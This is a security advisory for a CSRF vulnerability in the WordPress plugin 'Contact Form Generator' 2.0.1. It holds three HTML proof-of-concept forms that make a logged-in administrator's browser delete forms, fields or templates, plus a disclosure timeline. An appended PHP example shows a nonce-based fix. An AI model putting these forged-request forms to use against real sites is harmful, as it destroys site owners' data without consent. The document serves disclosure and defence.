# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# Plugin URI: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: Windows 10 + Firefox
==============
Description
==============
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the WordPress plugin 'Contact Form Generator'.
The issue can be exploited by sending a specially crafted link to a WordPress administrator who has the vulnerable plugin installed,
causing the victim administrator to delete a form (PoC #1), a form field (PoC #2), or an existing template (PoC #3).
-->
<!--
===============================
delete a form [CSRF PoC #1]
===============================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms" method="POST">
<input type="hidden" name="filter_state" value="2" />
<input type="hidden" name="filter_search" value="" />
<!-- form id value.. -->
<input type="hidden" name="ids[]" value="2" />
<!-- end -->
<input type="hidden" name="task" value="delete" />
<input type="submit" value="Delete form(s)" />
</form>
</body>
<!--
===============================
delete a field [CSRF PoC #2]
===============================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_fields" method="POST">
<input type="hidden" name="filter_form" value="3" />
<input type="hidden" name="filter_state" value="2" />
<input type="hidden" name="filter_type" value="0" />
<input type="hidden" name="filter_search" value="" />
<!-- fields ids to delete -->
<input type="hidden" name="ids[]" value="9" />
<input type="hidden" name="ids[]" value="10" />
<!-- end list -->
<input type="hidden" name="task" value="delete" />
<input type="hidden" name="ids[]" value="" />
<input type="submit" value="delete field(s)" />
</form>
</body>
<!--
==================================
delete a template [CSRF PoC #3]
==================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_templates" method="POST">
<input type="hidden" name="filter_state" value="2" />
<input type="hidden" name="filter_search" value="" />
<!-- an existing template id(s) to delete -->
<input type="hidden" name="ids[]" value="1" />
<!--end-->
<input type="hidden" name="task" value="delete" />
<input type="hidden" name="ids[]" value="" />
<input type="submit" value="Delete template(s)" />
</form>
</body>
</html>
<!--
===========
TIME-LINE
===========
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
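The three delete PoCs work because the list pages accept task=delete with an ids[] array from any origin. The following is an added defensive example, not the plugin's code: cfg_render_delete_form(), cfg_handle_delete() and the nonce action string are hypothetical, while page=cfg_forms / cfg_fields / cfg_templates, task and ids[] are the parameters the PoCs post. It shows the bulk-delete form carrying a per-page nonce, the handler rejecting a request without it, and ids[] being reduced to a clean list of positive integers before anything is deleted.

```php
<?php
// Added defensive example (not the plugin's code). Function names and the
// nonce action string are hypothetical; request parameters match the PoCs.

// The admin list page renders its own bulk-delete form with a nonce bound to
// that page, so only a form served by this site can submit a valid request.
function cfg_render_delete_form( $page, array $rows ) {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin.php?page=' . $page ) ) . '">';
    wp_nonce_field( 'cfg_bulk_delete_' . $page ); // adds _wpnonce and _wp_http_referer
    foreach ( $rows as $row ) {
        printf(
            '<label><input type="checkbox" name="ids[]" value="%d" /> %s</label>',
            absint( $row['id'] ),
            esc_html( $row['name'] ) // names may hold stored markup; escape on output
        );
    }
    echo '<input type="hidden" name="task" value="delete" />';
    echo '<input type="submit" value="Delete selected" />';
    echo '</form>';
}

// Returns the ids that may be deleted on $page, or dies on a forged request.
// $page is the value of the page query argument (cfg_forms, cfg_fields, cfg_templates).
function cfg_handle_delete( $page ) {
    if ( ! in_array( $page, array( 'cfg_forms', 'cfg_fields', 'cfg_templates' ), true ) ) {
        wp_die( 'Unknown page.' );
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // A POST built on another origin carries no valid _wpnonce: stop here,
    // before task or ids[] are even examined.
    check_admin_referer( 'cfg_bulk_delete_' . $page );

    if ( ! isset( $_POST['task'] ) || 'delete' !== $_POST['task'] ) {
        return array();
    }
    // ids[] must be a list of positive integers. The PoCs also send an empty
    // ids[] entry; absint() maps it to 0 and array_filter() drops it.
    $ids = ( isset( $_POST['ids'] ) && is_array( $_POST['ids'] ) ) ? $_POST['ids'] : array();
    $ids = array_map( 'absint', $ids );
    return array_values( array_unique( array_filter( $ids ) ) );
}
```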